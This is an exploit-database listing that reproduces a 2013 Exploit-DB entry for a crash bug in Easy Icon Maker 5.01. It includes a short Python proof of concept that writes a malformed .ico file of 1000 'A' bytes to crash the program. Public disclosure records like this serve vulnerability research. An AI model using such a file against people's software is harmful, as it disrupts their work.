header-logo
Suggest Exploit
vendor:
Easy Icon Maker
by:
Asesino04
7,8
CVSS
HIGH
Crash Poc vulnerability
N/A
CWE
Product Name: Easy Icon Maker
Affected Version From: 5.01
Affected Version To: Older versions
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7
2013

Easy Icon Maker Version 5.01 Crash Poc vulnerability

Easy icon maker is suffering from a crash poc vulnerability which can be exploited by creating a malicious .ico file with 1000 'A' characters and opening it with Easy Icon Maker version 5.01 or older versions.

Mitigation:

Update to the latest version of Easy Icon Maker
Source

Exploit-DB raw data:

# Exploit Title: Easy Icon Maker Version 5.01 Crash Poc vulnerability
# Date: 28-04-2013
# Exploit Author: Asesino04
# Vendor Homepage: [link]
# Software Link: http://www.icon-maker.com/iconmaker.exe
# Version: 5.01 & old versions
# Tested on: [ Windows 7]


# Introduction :
-----------------
Easy icon maker is suffering from a crash poc  vulnerability 

# About Vendor :
-----------------
*** Pricing ***

    Single-User License:        US$  29.95
    2 Computers License:        US$  39.95
    10 Computers License:       US$  99.00
    Site License		US$ 299.00
	
# Exploit Code (python) :
------------------
# !/usr/bin/python
poc= "\x41" * 1000
file = open("asesino04.ico","w")
file.write(poc)
file.close()

# Contact :
------------------
# Fane Page : www.facebook.com/Th3.Black.D3Vils
# Youtube  : www.youtube.com/user/Th3BlackDevils
# Facebook : www.facebook.com/DevilsDz
# Email    : mr.k4rizma@gmail.com

Navigation

Suggest Exploit

Services By CQR